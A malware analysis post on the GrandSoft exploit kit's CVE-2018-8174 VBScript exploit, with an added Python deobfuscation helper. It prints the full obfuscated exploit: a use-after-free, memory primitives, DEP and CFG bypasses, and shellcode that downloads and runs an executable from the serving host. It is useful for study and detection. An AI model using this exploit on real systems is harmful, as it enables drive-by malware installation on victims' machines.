Analyzing Shellcode of GrandSoft's CVE-2018-8174

First

The CVE-2018-8174 exploit code was published on 2018-05-21:
https://www.exploit-db.com/exploits/44741/

GrandSoft Exploit Kit previously used CVE-2016-0189; it now uses CVE-2018-8174. The exploit is almost identical to the public PoC, with some obfuscation added. The shellcode, however, is unique. Previously the VBScript (CVE-2016-0189) code generated the cryptographic key and decoded the payload; that work has now moved into the shellcode.

The previous flow was as follows:
    Random number generation -> generate the key from the random number ->
    append the key to the end of the URL -> download the encrypted malware ->
    decode with the key

The new flow is as follows:
    Random key generation -> append the key to the end of the URL ->
    download the encrypted malware -> decode with the key

    (all of this is done in the shellcode)

Traffic

First, let's look at the recent GrandSoft traffic. A link to the saz file is given in Kafeine's blog:
https://malware.dontneedcoffee.com/2018/05/CVE-2018-8174.html

Opening the saz file shows the following:


The traffic flow is unchanged: it consists of the landing page, the exploit and the malware. CVE-2018-8174 is used for the exploit, which downloads and executes the malware. The malware payload is encrypted, so the shellcode decrypts it using numeric values taken from the URL.

CVE-2018-8174

For a technical explanation of CVE-2018-8174, please refer to other articles, for example:
https://securelist.com/root-cause-analysis-of-cve-2018-8174/85486/

The code actually used in GrandSoft looks like this:

Dim r4kWFTbo0
Dim OOOOO0O000
Dim u1QxQecTnfNH1
Dim OOOOO0O0000(40)
Dim o3qpIbXXvzd2
Dim OOOOO0O
Dim X6siIaXObDC3
Dim OOOOO0O0(6),OOOOO0O00(6)
S9nDOpLGtte = "End Function "
Dim b3XMsCkw5
Dim OOOOO0O00000,OOOOO0O000000
Dim T3QDCGhIo6
Dim OOOOO0O0000000
Dim l2dVvpwTgOZD7
Dim OOOOO0O00000000,OOOOO0O000000000
Dim V8LOuHnAcRF8
Dim OOOOO0O0000000000,OOOOO0O00000000000
L3GBDCQZNFT = "While Not x7fypqe.C1wRZrhz "
Dim O000O,O000OOO
Dim y8NSoVzQAaSr10
J5iGkJWBn = "For Each F4vTHd In l2IfOxf While Not B2DMl.d9HfMrAG For Each w1PXwuZ In y0RKKEQt "
OOOOO0O0000000=195940000 + 8557
Dim v9UpHkIm12
OOOOO0O00000=Unescape("%u0001%u0880%u0001%u0000%u0000%u0000%u0000%u0000%uffff%u7fff%u0000%u0000")
Dim X3OruFyGUBq13
OOOOO0O000000=Unescape("%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000")
Dim K4eTurgmPOJd14
OOOOO0O000=195800000 + 90093
Dim a9qWUTDvuTrS15
T5pctFCV = "Set m9IIiUhl = New V9NvMKu "
Dim U8VHUioXabcA17
Function lIIII(ByVal lIlIl)
Dim Z4ZrCVSsLU18
O000OOO0000=""
Dim T1UJcTQUz19
For index=0 To Len(lIlIl)-1
Dim T5CCqUuUd20
O000OOO0000=O000OOO0000 &lIlI(Asc(Mid(lIlIl,index+1,1)),2)
Dim B0QkRvxfTH21
Next
Dim i3zeBlfxLc22
O000OOO0000=O000OOO0000 &"00"
Dim b0JmqTWpuJ23
If Len(O000OOO0000)/(&h15c6+3068-&H21c0) Mod (&h1264+2141-&H1abf)=(&hc93+6054-&H2438) Then
Dim X2BSPCpsWD24
O000OOO0000=O000OOO0000 &"00"
Dim z0uqreSro25
End If
Dim V2VQLeiRXc26
For IIIl=(&h1a1a+3208-&H26a2) To Len(O000OOO0000)/(&h1b47+331-&H1c8e)-(&h14b2+4131-&H24d4)
e9sciEEDqf = "Set Q9hin = Nothing "
lIIIlI=Mid(O000OOO0000,IIIl*(&h576+1268-&Ha66)+(&ha64+6316-&H230f),(&ha49+1388-&Hfb3))
Dim Q2uMseQQCM28
lIlIll=Mid(O000OOO0000,IIIl*(&hf82+3732-&H1e12)+(&h210+2720-&Hcaf)+(&h4fa+5370-&H19f2),(&hf82+5508-&H2504))
N7MmiIIpTx = "Set E7acoa = New G1OTQ Function K3sWQT(F9MeC, H5ATAPn Sub a9MTrCZO "
lIIII=lIIII &"%u" &lIlIll &lIIIlI
Dim o3DXOOLH30
Next
Dim F9QQltbQmsDW31
End Function
Dim R2wcSFhyfEEl32
Function lIlI(ByVal Number,ByVal Length)
s9HgDbuWD = "If Len(n2lab.z2INAL) > 0 Then For Each l9IlvTTU In N5QgByF "
IIII=Hex(Number)
e7WKICuQL = "If Len(Q7cENk.I8AIUv) > 0 Then Set d5zIGJLQ = Nothing "
If Len(IIII)<Length Then
O8IDAWqOeILF = "Sub L4tDKB While Not m9BkQT.L5axfDtw End Sub "
IIII=String(Length-Len(IIII),"0") &IIII 'pad allign with zeros
Dim R2atgdRXVpO36
Else
h3mopXfkSm = "Function m4UHTkmT(G9WcQc, s3gdzzl If Len(G4TBLnwf.O3vEm) > 0 Then If Len(Z4PolZIw.I1QvcS) > 0 Then "
IIII=Right(IIII,Length)
m9NxsPWOv = "Set b7KvI = Nothing "
End If
Dim S2LvJrTaoUmM39
lIlI=IIII
O7VykVQFip = "Set k4spM = New H8hxq Private Sub Class c8zBRvSi Sub f2lSCL "
End Function
z2JdzgSLyrE = "If Len(a9lWy.o0Twn) > 0 Then f5oafA = L1EwTzlt & Trim(G6XbPbp.g4Xrh()) Set G0TTReMq = New Z7TCZ "
Function G0000(lIII)
Dim H5IOLSmP42
Dim value
Dim y2UOvplgAeex43
OOOOO0O00000000.mem(OOOOO0O0000000+8)=lIII+4
Dim T9JMeWFbX44
OOOOO0O00000000.mem(OOOOO0O0000000)=8 'type string
Dim t0SSLSxubCt45
value=OOOOO0O00000000.P0123456789
Dim C6LGgCXIr46
OOOOO0O00000000.mem(OOOOO0O0000000)=2
Dim J1qbCHws47
G0000=value
D6UWINuBhAH = "End Sub Private Sub Class y4xBnvP End Sub "
End Function
s1CIITiCbhc = "Function F6ywsTt(k6xBJ, p2RpOTQn End Function "
Function G00001(lIII)
c4dDUJlLLqC = "End Function "
G00001=G0000(lIII) And (131071-65536)
Dim k3rMFITCXPp51
End Function
Dim t1LcHCkwJx52
Function G000011(lIII)
o9dogsKrLHkC = "Set m3QkPShp = New P6OwpA "
G000011=G0000(lIII) And (&h17eb+1312-&H1c0c)
Z7FlbxSDcH = "Sub H3GWLP "
End Function
Dim t3mSOULv55
Sub llllll
Dim Z1SnlopJdSL56
End Sub
Dim p0IdWEPHXLJ57
Function vsscsc44444
Dim d9pwhdnlX58
OOOOO0O00000000.mem(OOOOO0O0000000)=(&h713+3616-&H1530)
L8zkLNTeLx = "Set t3aRG = Nothing "
vsscsc44444=OOOOO0O00000000.mem(OOOOO0O0000000+(&h169c+712-&H195c))
J1THdsnL = "Set G4albCG = New y9lgp End Sub "
End Function
Dim M8sgJJAfnQpH61
Sub ssdsssdsdsdsdsdsdsdsd(ByRef IlIIIl)
Dim A2ZMKsfZdd62
OOOOO0O00000000.mem(OOOOO0O0000000+(&h715+3507-&H14c0))=IlIIIl
b3oqMrfz = "For Each t7WrUTU In T8LHhr "
End Sub
Dim W3yMNdyVSv64
Function G0000115
r2XztgkSTEW = "Set u1bxACFy = New v3tEWu End Function "
On Error Resume Next
Dim S4XqwpilAH66
Dim lllll
Dim f8sDqsTSQL67
lllll=llllll
Dim E2BqeWcnuc68
lllll=null
Dim W7qNHJzrG69
ssdsssdsdsdsdsdsdsdsd lllll
Dim d2TIAZnDo70
G0000115=vsscsc44444()
Dim n5KUcEFGiSi71
End Function
Dim O0IKHtbN72
Function G00001152(IllIll)
z7hhKJLp = "Set x3uhBrS = New l5QDsHqU Function T5HFVdI(I6UbI, E5PFBJ "
Dim llIl
Dim E4gIVxRTp74
llIl=IllIll And &hffff0000
Dim T4qMdKxD75
Do While G0000(llIl+(&h748+4239-&H176f))<>544106784 Or G0000(llIl+(&ha2a+7373-&H268b))<>542330692
J9RgfDLVOV = "Private Sub Class F7QIiOmm While Not P3BKMAzx.n6DEN Private Sub Class U6tvbfTa "
llIl=llIl-65536
Dim G9JdsIMouI77
Loop
Dim V8uiilDP78
G00001152=llIl
L1oxiVHwW = "End Sub "
End Function
B7stXivWEk = "For Each f8ySXo In v5wKkM If Len(D8qFKpi.y6BTRoQb) > 0 Then Set S1uEaaR = Nothing "
Function StrCompWrapper(lIII,llIlIl)
Dim P1FgqQgqC81
Dim lIIlI,IIIl
Dim s9MEXOQP82
lIIlI=""
Dim w9GofFRihKNW83
For IIIl=(&ha2a+726-&Hd00) To Len(llIlIl)-(&h2e1+5461-&H1835)
Dim Q5hbvtsT84
lIIlI=lIIlI &Chr(G000011(lIII+IIIl))
Dim l8BfqpCByv85
Next
Dim I9CtgtQThN86
StrCompWrapper=StrComp(UCase(lIIlI),UCase(llIlIl))
z6XPmMwOfI = "Set g2efvH = Nothing Private Sub Class J4qpf While Not w0pRBFsO.n5BKft "
End Function
Dim g5yPikcqhF88
Function GetBaseFromImport(base_address,name_input)
Dim z4ztTTFnLt89
Dim import_rva,nt_header,descriptor,import_dir
Dim e8uAELMXgrIg90
Dim IIIIII
I0GNqfUHq = "End Sub While Not r9TTQ.R6KPot u4Vvqd = t9TSNfB & Trim(H2iGBiK.v1Lzp()) "
nt_header=G0000(base_address+(&h3c))
Dim d3XiqbLtuk92
import_rva=G0000(base_address+nt_header+&h80)
d5UfvJZTvkDA = "Set U8LIr = New l6VRpf For Each c1hIW In G6yuVb "
import_dir=base_address+import_rva
Dim w9NPmTRb94
descriptor=0
x8wgQaGh = "For Each T8IgL In n1fBIH "
Do While True
Dim W6WBdUzDbvwE96
Dim Name
Dim x0uyChlT97
Name=G0000(import_dir+descriptor*(&h14)+&hc)
Dim Z6XsdyIhla98
If Name=0 Then
X7XUaLvr = "Private Sub Class N9kQCuO While Not K3KHCgNF.k6HucRFr Sub S8Xfxd "
GetBaseFromImport=&hBAAD0000
Dim N5AiIGoghWf100
Exit Function
Dim O2rPRNMVmG101
Else
Dim B8cTChhq102
If StrCompWrapper(base_address+Name,name_input)=0 Then
Dim J0ogIoHT103
Exit Do
Dim D2Abemgyux104
End If
Dim E2fSTQld105
End If
Dim S7SiTdunRdMM106
descriptor=descriptor+1
Dim O4PSMlcs107
Loop
F3mtkFNE = "End Function Set d8WqBE = New i6RFgKc Function m5ZmoTEf(I4LuxIdK, h9Edgqv "
IIIIII=G0000(import_dir+descriptor*(&h14)+&h10)
J8OHAemJhKA = "Set h3NHcAT = New U5kGz o5ESlP = n6ZoHw & Trim(I9VEFef.R9dOAbg()) "
GetBaseFromImport=G00001152(G0000(base_address+IIIIII))
Dim L1XvWADVVMB110
End Function
Dim y3zlrXnJS111
Dim E6NVTggrAK112
Function gddgddddddddd(G0000115222,name)
Dim w1vWZCiDEM113
Dim p,G00001152223,index
Dim A1RaffVHAFV114
Dim G000011522,function_names,function_ordin
Dim Q4MvmDCrqg115
Dim Illlll
Dim D9PygrcSmhHo116
p=G0000(G0000115222+&h3c)
n9Liwczo = "Sub J0QRG If Len(A7VzCkM.V6WsyFTt) > 0 Then "
p=G0000(G0000115222+p+&h78)
Dim Z7sryoHBsJ118
G00001152223=G0000115222+p
E1rrArlu = "Set T2IkGsT = New G2hIVZ u6kVMog = t2KlTP & Trim(L9neteV.y5MGkJ()) "
Dim H7TRQNkIun120
G000011522=G0000115222+G0000(G00001152223+&h1c)
Dim I6eExGoU121
function_names=G0000115222+G0000(G00001152223+&h20)
Dim L6kLMxwC122
function_ordin=G0000115222+G0000(G00001152223+&h24)
Dim Z2TaZfXCpJx123
index=0
Dim Q1vbnCTrD124
Do While True
o4yryAoATUBs = "Set d3kHEdt = New s7EUrHp "
Dim lllI
Dim q8qsfopzJdk126
lllI=G0000(function_names+index*4)
Dim Z0gPhSglVVKw127
If StrCompWrapper(G0000115222+lllI,name)=0 Then
Dim A0XQZwzJTXl128
Exit Do
Dim U2ZtOITTXH129
End If
Dim Z2iuSSLwLN130
index=index+1
Dim R9ipqBakoCCT131
Loop
u6fPloJJL = "Set O5vMVf = Nothing Set o6wTWUTq = New f1JsV l6aBcl = B8KItmy & Trim(Z2stAkdE.K5EiUeFZ()) "
Illlll=G00001(function_ordin+index*2)
t4JOAPxWao = "Private Sub Class g4FdoGo "
p=G0000(G000011522+Illlll*4)
R8LXAlutqC = " L4CCBJN = z8yaTQ & Trim(k5OsgDXz.w8buNcnK()) Sub X3UcNLRp End Sub "
gddgddddddddd=G0000115222+p
Dim f5wuapzZB135
End Function
Dim P5OMufJnkb136
Dim g9xsrGBR0
Dim L5VvPmXuCHo1
Function aaaAA33444333555(ByVal value)
Dim H9hmIkcDI2
Dim High,Low
Dim o3GrVTUD3
High=lIlI((value And &hffff0000)/&h10000,4)
Dim z2VyTmBR4
Low=lIlI(value And &hffff,4)
Dim P9XStNoPA5
aaaAA33444333555=Unescape("%u" &Low &"%u" &High)
Dim B1aZedSCP6
End Function
Dim d2fnrwOlIol7
Function lIllIl
Dim K6gXLTdiXw8
Dim IIIl,G000011522232,G00001152223246,G0000115222324,aaaAA33444333,aaaAA33,aaaAA33444
Dim p6QoNVGTH9
G000011522232=lIlI(O000O,8)
W8xGiLZQgm = "While Not u1OONAE.I3bqF For Each H3vAFqxz In Q9wNFPGL For Each T4gktCu In H4qeP "
G0000115222324=Mid(G000011522232,1,2)
Dim M0SXXrUzUJcr11
aaaAA33444333=Mid(G000011522232,3,2)
Dim g7ZssRnIIR12
aaaAA33=Mid(G000011522232,5,2)
Dim Z1pDPKoE13
aaaAA33444=Mid(G000011522232,7,2)
Dim B4Clfwhmppb14
G00001152223246=""
F9MDopUDeLh = "For Each v9kLVdPp In E8Bscw Private Sub Class W7HqB Set x4lZenvX = Nothing "
G00001152223246=G00001152223246 &"%u0000%u" &aaaAA33444 &"00"
Dim h3NmfOTlHkqC16
For IIIl=1 To 3
Dim Q0dNAFMpBX17
G00001152223246=G00001152223246 &"%u" &aaaAA33444333 &aaaAA33
L6QTQhTyZrQc = "Sub W6zytNI End Sub While Not z2yzkCNL.S4Mkb "
G00001152223246=G00001152223246 &"%u" &aaaAA33444 &G0000115222324
Dim x6eucfEfWQU19
Next
Dim h6RNTOURIQX20
G00001152223246=G00001152223246 &"%u" &aaaAA33444333 &aaaAA33
Dim R4cryWNyx21
G00001152223246=G00001152223246 &"%u00" &G0000115222324
M0KNhJRT = "End Sub "
lIllIl=Unescape(G00001152223246)
Dim X8zgTTLkMd23
End Function
Dim G3fTNmSMKU24
Function jjjjj333333(ShellcodeAddrParam) 'bypass cfg
Dim c7KtVzyvFcT25
Dim G00001152223246
Dim p8xDxemX26
G00001152223246=String((100334-65536),Unescape("%u4141"))
Dim x3sMCAqdr27
G00001152223246=G00001152223246 &aaaAA33444333555(ShellcodeAddrParam)
Dim c4RLWlbqTRqe28
G00001152223246=G00001152223246 &aaaAA33444333555(ShellcodeAddrParam)
Dim P4ZPKcRItFXG29
G00001152223246=G00001152223246 &aaaAA33444333555(&h3000)
Dim b9RppUdna30
G00001152223246=G00001152223246 &aaaAA33444333555(&h40)
Dim y7NHmxEO31
G00001152223246=G00001152223246 &aaaAA33444333555(ShellcodeAddrParam-8)
Dim p1rPTbQAzzNu32
G00001152223246=G00001152223246 &String(6,Unescape("%u4242"))
q5mhWpHSO = "Function f5WdLxFT(W1IzXrlr, h4DwhVc Private Sub Class d9qfwI Set R6OMgp = New z2HbLTe "
G00001152223246=G00001152223246 &lIllIl()
Dim o7nipSBlTptJ34
G00001152223246=G00001152223246 &String((&h80000-LenB(G00001152223246))/2,Unescape("%u4141"))
R7HslHPu = "Sub h2fHJ "
jjjjj333333=G00001152223246
Dim T1rCzxbaBmS36
End Function
Dim X7PXMUADl37
Function eeee6666(mmm22222)
Dim d1tFcNgPT38
Dim G00001152223246
Dim T1nliuABi39
Dim lllllI
Dim C8GxXneW40
lllllI=mmm22222+&h23
T9NEwrqhcN = "End Function "
G00001152223246=""
Dim D6DVtLOSbWeA42
G00001152223246=G00001152223246 &aaaAA33444333555(lllllI)
Dim F7DDoWkmetNA43
G00001152223246=G00001152223246 &String((&hb8-LenB(G00001152223246))/2,Unescape("%4141"))
Dim O1TvStXN44
G00001152223246=G00001152223246 &aaaAA33444333555(O000OOO)
Dim x2QKxZPgWSrm45
G00001152223246=G00001152223246 &aaaAA33444333555(&h1b)
Dim g3TSGwNNTvl46
G00001152223246=G00001152223246 &aaaAA33444333555(0)
I5cwEhOROJZp = "End Sub "
G00001152223246=G00001152223246 &aaaAA33444333555(mmm22222)
Dim G8gTBuqohTA48
G00001152223246=G00001152223246 &aaaAA33444333555(&h23)
Dim I2TEHrVNkSn49
G00001152223246=G00001152223246 &String((&400-LenB(G00001152223246))/2,Unescape("%u4343"))
Dim C5LKfeoz50
eeee6666=G00001152223246
Dim Q1kBLgWai51
End Function
Dim w9hKsTiITQT52
Sub ExecuteShellcode
Dim a5vsITVrr53
OOOOO0O00000000.mem(OOOOO0O0000000)=&h4d 'DEP bypass
W9yiSsZEFH = "End Sub End Sub End Sub "
OOOOO0O00000000.mem(OOOOO0O0000000+8)=0
V3hTApwpF = "Set G9fhXW = New A4rXxqo Set u8rTTyc = New o4VFg Private Sub Class e9TXunV "
msgbox(OOOOO0O0000000) 'VT replaced
e9vSIHqy = "For Each w2dcN In m3UmafoO Function E1guW(s8Tdm, Q5ygfTXZ Function D7bxCbg(L2AXuRG, i0ZfGm "
End Sub
Dim K3dzbfOBuzgb57
Dim q9hgUHqmUShe58
Class cla1
Private Sub Class_Terminate()
Set OOOOO0O0(OOOOO0O000)=OOOOO0O((&h1078+5473-&H25d8))
OOOOO0O000=OOOOO0O000+(&h14b5+2725-&H1f59)
OOOOO0O((&h79a+3680-&H15f9))=(&h69c+1650-&Hd0d)
End Sub
End Class
Class cla2
Private Sub Class_Terminate()
Set OOOOO0O00(OOOOO0O000)=OOOOO0O((&h15b+3616-&Hf7a))
OOOOO0O000=OOOOO0O000+(&h880+542-&Ha9d)
OOOOO0O((&h1f75+342-&H20ca))=(&had3+3461-&H1857)
End Sub
End Class
Class IIIlIl
End Class
Class llIIl
Dim mem
Function P
End Function
Function SetProp(Value)
mem=Value
SetProp=0
End Function
End Class
Class IIIlll
Dim mem
Function P0123456789
P0123456789=LenB(mem(OOOOO0O0000000+8))
End Function
Function SPP
End Function
End Class
Class lllIIl
Public Default Property Get P
Dim llII
P=174088534690791e-324
For IIIl=(&h7a0+4407-&H18d7) To (&h2eb+1143-&H75c)
OOOOO0O0(IIIl)=(&h2176+711-&H243d)
Next
Set llII=New IIIlll
llII.mem=OOOOO0O00000
For IIIl=(&h1729+3537-&H24fa) To (&h1df5+605-&H204c)
Set OOOOO0O0(IIIl)=llII
Next
End Property
End Class
Class llllII
Public Default Property Get P
Dim llII
P=636598737289582e-328
For IIIl=(&h1063+2314-&H196d) To (&h4ac+2014-&Hc84)
OOOOO0O00(IIIl)=(&h442+2598-&He68)
Next
Set llII=New IIIlll
llII.mem=OOOOO0O000000
For IIIl=(&h7eb+3652-&H162f) To (&h3e8+1657-&Ha5b)
Set OOOOO0O00(IIIl)=llII
Next
End Property
End Class
Set OOOOO0O0000000000=New lllIIl
Set OOOOO0O00000000000=New llllII
Sub UAF
For IIIl=(&hfe8+3822-&H1ed6) To (&h8b+8633-&H2233)
Set OOOOO0O0000(IIIl)=New IIIlIl
Next
For IIIl=(&haa1+6236-&H22e9) To (&h1437+3036-&H1fed)
Set OOOOO0O0000(IIIl)=New llIIl
Next
OOOOO0O000=0
For IIIl=0 To 6
ReDim OOOOO0O(1)
Set OOOOO0O(1)=New cla1
Erase OOOOO0O
Next
Set OOOOO0O00000000=New llIIl
OOOOO0O000=0
For IIIl=0 To 6
ReDim OOOOO0O(1)
Set OOOOO0O(1)=New cla2
Erase OOOOO0O
Next
Set OOOOO0O000000000=New llIIl
End Sub
Sub InitObjects
OOOOO0O00000000.SetProp(OOOOO0O0000000000)
OOOOO0O000000000.SetProp(OOOOO0O00000000000)
OOOOO0O0000000=OOOOO0O000000000.mem
End Sub
Sub sssfsfsfsfsfs222
UAF
InitObjects
vb_adrr=G0000115()
vbvvvvvvvv=G00001152(G0000(vb_adrr))
mbmmmmmmm=GetBaseFromImport(vbvvvvvvvv,"msvcrt.dll")
mbmbmdddcdd=GetBaseFromImport(mbmmmmmmm,"kernelbase.dll")
ntffdddddfss=GetBaseFromImport(mbmmmmmmm,"ntdll.dll")
O000OOO=gddgddddddddd(mbmbmdddcdd,"VirtualProtect")
O000O=gddgddddddddd(ntffdddddfss,"NtContinue")
ssdsssdsdsdsdsdsdsdsd c111111()
c2222222=vsscsc44444()+8
ssdsssdsdsdsdsdsdsdsd jjjjj333333(c2222222)
mmm22222=vsscsc44444()+69596
ssdsssdsdsdsdsdsdsdsd eeee6666(mmm22222)
mnmm4333333=vsscsc44444()
ExecuteShellcode
End Sub
Function c111111()
locationUrl = "http://" & window.location.hostname & "/7"
strString = locationUrl
linkHex =""
For i=1 To Len(strString)
linkHex = linkHex + Hex(Asc(Mid(strString,i,1)))
Next
stringSC = ""
stringSC = linkHex + ""
g = Round(Len(stringSC)/4)
if g <> (Len(stringSC)/4) Then stringSC = stringSC + "00"
outStr = ""
For i = 1 to Len(stringSC) Step 4
outStr = outStr + "%u" + Mid(stringSC,i+2,2) + Mid(stringSC,i,2)
Next
U109 = "%u"
U88 = "%uE8"
UF1 = "%uF"
outStr = outStr + "%u0000"
G00001152223246=Unescape(""& U109 &"0000"& U109 &"0000"& U109 &"0000"& U109 &"0000") &Unescape(""& U109 &"9CE9"& U109 &"0002"& U109 &"3100"& U109 &"64C9"& U109 &"718B"& U109 &"8B30"& U109 &"0C76"& U109 &"768B"& U109 &"8B1C"& U109 &"086E"& U109 &"468B"& U109 &"8B20"& U109 &"6636"& U109 &"4839"& U109 &"7518"& U109 &"8BF2"& U109 &"3C45"& U109 &"548B"& U109 &"7805"& U109 &"EA01"& U109 &"728B"& U109 &"0120"& U109 &"52EE"& U109 &"C931"& U109 &"4149"& U109 &"01AD"& U109 &"31E8"& U109 &"0FDB"& U109 &"10BE"& U109 &"F238"& U109 &"0874"& U109 &"CBC1"& U109 &"010E%u40D3"& UF1 &"1EB%u1F3B%uE775%u8B5A%u2472%uEE01%u8B66%u4E0C%u728B%u011C%u8BEE%u8E04"& U88 &"01%uC3AB"& U88 &"5F"& UF1 &"F9F"& UF1 &"FFF%uB4E8"& UF1 &"FFF"& U88 &"FF"& UF1 &"FAF"& UF1 &"FFF%uAAE8"& UF1 &"FFF"& U88 &"FF"& UF1 &"FA5"& UF1 &"FFF%uA0E8"& UF1 &"FFF"& U88 &"FF"& UF1 &"F9B"& UF1 &"FFF%u96E8"& UF1 &"FFF"& U88 &"FF"& UF1 &"F91"& UF1 &"FFF%u3368%u0032%u6800%u7375%u7265"& UF1 &"F54"& UF1 &"C57%uC589%u7CE8"& UF1 &"FFF"& U88 &"FF"& UF1 &"F77"& UF1 &"FFF%u6E68%u7465%u6800%u6977%u696E"& UF1 &"F54"& UF1 &"457%uC589%u62E8"& UF1 &"FFF"& U88 &"FF"& UF1 &"F5D"& UF1 &"FFF%u58E8"& UF1 &"FFF"& U88 &"FF"& UF1 &"F53"& UF1 &"FFF%u4EE8"& UF1 &"FFF%u6AFF%u6840%u1000%u0000%u0068%u07D0%u6A00"& UF1 &"F00%uC457%u0789%uC689%u57FF%u89CC%u8106%u00C6%u0010%u5600%u0068%u0008"& UF1 &"F00%uC857%u078B"& UF1 &"B89%uC383%u8904%u83F9%u6DE9%uC689%uC683"& UF1 &"F08%u5330%u5651%u57FF%u8BE8%u8907%u81C3%u00C3%u0010%u8900%u83F9%u67E9%u30FF%u5153"& UF1 &"F53%uE457%u378B%uC683%u6A08%u6A00%u6A00%u6A00%u5600%u57FF%u89EC%uEC47%u006A%u006A%u006A%u006A"& UF1 &"F56%uEC77%u57FF%u89F0"& UF1 &"047%u078B%u0005%u0010%u6A00%u6A00%u6A50%u6A02%u6A00%u6802%u0000%u4000"& UF1 &"F50%uD457%u4789%u8BD4%u8137%u08C6%u0023%uC700"& UF1 &"846%u0001%u0000%u078B%u188B%u7E83%u00F8%u4074"& UF1 &"089"& U88 &"83%u5008%u0068%u0004%u5600%u77FF"& UF1 &"FF0"& UF1 &"857%u7E83%u00F8%u2874%u4E8B%u89F8%u48F0%u8140%uAAC3%u0000%u8000%u48F3%u1830"& UF1 &"2E2"& UF1 &"089"& U88 
&"83%u6A04%u5000%u76FF%u56F8%u77FF"& UF1 &"FD4%uD857%uBAEB%u77FF"& UF1 &"FD4%uDC57%u77FF"& UF1 &"FF0"& UF1 &"C57%u77FF"& UF1 &"FEC"& UF1 &"C57"& UF1 &"B89%uEB83%u8B4D%u0507%u1000%u0000"& UF1 &"989%uE983%u8B7B%u812F%u00C5%u0030%u5000%u5153"& UF1 &"F55%uE457%u6C68%u3233%u6800%u6873%u6C65"& UF1 &"F54%uE057%u9090%u9090%u8990%u83C5%u04EF%u07C7%u065A%u4C98%u04E8"& UF1 &"FFE%u8BFF%u8137%u00C6%u0010%u8B00%u0507%u3000%u0000"& UF1 &"B89%uEB83%u8955%u81FE%u83EE%u0000%u8900%u81F9%u8FE9%u0000%u6A00%u6A01%u5000%u5156%u006A%u57FF%u83FC%u05F8%uD374%u006A"& UF1 &"E6A%u57FF%u72C0%u7500%u6E00%u6100%u7300%u0000%u6300%u6D00%u6400%u0000%u2500%u7300%u2200%u2500%u7300%u2200%u0000%u2500%u2F73%u6425%u2500%u7300%u2500%u6400%u2E00%u6500%u7800%u6500%u0000%u6300%u6D00%u6400%u2000%u2F00%u4300%u2000%u0000"& U88 &"00"& UF1 &"DBA"& UF1 &"FFF%u6FD0%u26FD%u6F8A%u13C6%u3B42%u208B%u8E70%u1022%uB1AD%u4F89%u8EF8"& UF1 &"470"& UF1 &"C13%u638D%uB973%u01D5%u1DF9%uA97F%u70B5%uA596%u709F%uA596%uC2C2%uBE70%uA391%uB75F%uAE00%uBCB9%uE926%u639E%uD37E%u88A8%u0000%u0000" & outStr )
G00001152223246=G00001152223246 & String((&h80000-LenB(G00001152223246))/2,Unescape("%u4141"))
c111111=G00001152223246
End Function
sssfsfsfsfsfs222
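
The listing above hides its constants behind hex arithmetic such as (&h15c6+3068-&H21c0) and pads every function with Dim declarations and string assignments that are never referenced. The following deobfuscation helper is an added example (not code from the post or from the exploit kit): it folds those constant expressions into plain numbers and drops declarations and string assignments whose name appears nowhere else in the script. The sample input is constructed from a few lines of the listing above, reordered; the function names are mine.

```python
import re

# Constructed sample in the style of the GrandSoft listing: junk "Dim" lines and
# junk string assignments mixed with real statements that use hex-arithmetic
# constants (the lines are taken from the listing above and reordered).
SAMPLE = """Dim r4kWFTbo0
Dim OOOOO0O000
S9nDOpLGtte = "End Function "
OOOOO0O000=195800000 + 90093
If Len(O000OOO0000)/(&h15c6+3068-&H21c0) Mod (&h1264+2141-&H1abf)=(&hc93+6054-&H2438) Then
O000OOO0000=O000OOO0000 &"00"
End If
G00001=G0000(lIII) And (131071-65536)
"""

# (&hAAAA+NNNN-&HBBBB)  ->  single decimal constant
HEX_TRIPLE = re.compile(r"\(&[hH]([0-9a-fA-F]+)\+(\d+)-&[hH]([0-9a-fA-F]+)\)")
# (131071-65536)  ->  65535
DEC_DIFF = re.compile(r"\((\d+)-(\d+)\)")
# 195800000 + 90093  ->  195890093
DEC_SUM = re.compile(r"(?<![\w.])(\d+) \+ (\d+)(?![\w.])")
IDENT = re.compile(r"[A-Za-z_]\w*")
JUNK_DIM = re.compile(r"^\s*Dim\s+([A-Za-z_]\w*)\s*$")
JUNK_STR = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*"[^"]*"\s*$')


def fold_constants(line: str) -> str:
    """Replace the obfuscated constant expressions on one line with their value."""
    line = HEX_TRIPLE.sub(
        lambda m: str(int(m.group(1), 16) + int(m.group(2)) - int(m.group(3), 16)), line)
    line = DEC_DIFF.sub(lambda m: str(int(m.group(1)) - int(m.group(2))), line)
    line = DEC_SUM.sub(lambda m: str(int(m.group(1)) + int(m.group(2))), line)
    return line


def strip_dead_code(script: str) -> str:
    """Drop 'Dim x' and 'x = "..."' lines whose name is referenced nowhere else."""
    lines = script.splitlines()
    counts = {}
    for ln in lines:
        for ident in IDENT.findall(ln):
            counts[ident] = counts.get(ident, 0) + 1
    kept = []
    for ln in lines:
        m = JUNK_DIM.match(ln) or JUNK_STR.match(ln)
        if m and counts.get(m.group(1), 0) == 1:
            continue  # declared or assigned once, never used: junk
        kept.append(ln)
    return "\n".join(kept) + "\n"


def deobfuscate(script: str) -> str:
    """Strip the junk lines first, then fold the constants on what remains."""
    cleaned = strip_dead_code(script).splitlines()
    return "\n".join(fold_constants(ln) for ln in cleaned) + "\n"


if __name__ == "__main__":
    print(deobfuscate(SAMPLE))
```

Run on the full listing, the If line above becomes "If Len(O000OOO0000)/2 Mod 2=1 Then", which is exactly the padding check from the public PoC; the name-count heuristic keeps every declaration that the real code uses (such as Dim OOOOO0O000) and removes only the decoys.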

Dead code is included, but it is basically the same as the PoC. What differs from the PoC is the GetShellcode part. GrandSoft's GetShellcode function has been renamed to c111111, and it looks like this:

Function c111111()
locationUrl = "http://" & window.location.hostname & "/7"
strString = locationUrl
linkHex =""
For i=1 To Len(strString)
linkHex = linkHex + Hex(Asc(Mid(strString,i,1)))
Next
stringSC = ""
stringSC = linkHex + ""
g = Round(Len(stringSC)/4)
if g <> (Len(stringSC)/4) Then stringSC = stringSC + "00"
outStr = ""
For i = 1 to Len(stringSC) Step 4
outStr = outStr + "%u" + Mid(stringSC,i+2,2) + Mid(stringSC,i,2)
Next
U109 = "%u"
U88 = "%uE8"
UF1 = "%uF"
outStr = outStr + "%u0000"
